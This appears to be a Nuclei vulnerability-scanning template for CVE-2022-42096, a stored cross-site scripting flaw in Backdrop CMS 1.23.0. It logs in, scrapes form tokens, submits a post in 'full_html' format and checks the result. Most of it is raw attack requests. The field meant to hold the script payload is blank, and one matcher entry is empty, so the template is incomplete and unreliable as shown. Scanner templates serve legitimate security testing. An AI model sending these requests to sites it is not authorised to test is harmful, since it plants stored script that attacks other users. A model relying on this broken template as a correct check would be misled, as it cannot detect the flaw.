id: CVE-2022-42096 info: name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored) author: theamanrawat severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42096 - https://nvd.nist.gov/vuln/detail/CVE-2022-42096 - https://backdropcms.org classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42096 cwe-id: CWE-79 epss-score: 0.00569 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: max-request: 5 verified: true vendor: backdropcms product: backdrop_cms tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive http: - raw: - | GET /?q=user/login HTTP/1.1 Host: {{Hostname}} - | POST /?q=user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in - | GET /?q=node/add/post HTTP/1.1 Host: {{Hostname}} - | POST /?q=node/add/post HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="title" {{randstr}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="field_tags[und]" {{randstr}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="body[und][0][summary]" ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="body[und][0][value]" ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="body[und][0][format]" full_html ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="files[field_image_und_0]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="field_image[und][0][fid]" 0 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="field_image[und][0][display]" 1 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="changed" ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="form_build_id" {{form_id_1}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="form_token" {{form_token}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="form_id" {{form_id_2}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="scheduled[date]" 2023-04-25 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="scheduled[time]" 16:59:23 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="promote" 1 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="name" {{name}} ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="date[date]" 2023-04-24 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="date[time]" 16:59:23 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="path[auto]" 1 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="comment" 2 ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="additional_settings__active_tab" ------WebKitFormBoundaryIubltUxssi0yqDjp Content-Disposition: form-data; name="op" Save ------WebKitFormBoundaryIubltUxssi0yqDjp-- - | GET /?q=posts/{{randstr}} HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - - Backdrop CMS condition: and - type: status status: - 200 extractors: - type: regex name: form_id_1 group: 1 regex: - name="form_build_id" value="(.*)" internal: true - type: regex name: name group: 1 regex: - name="name" value="(.*?)" internal: true - type: regex name: form_id_2 group: 1 regex: - name="form_id" value="(.*)" internal: true - type: regex name: form_token group: 1 regex: - name="form_token" value="(.*)" internal: true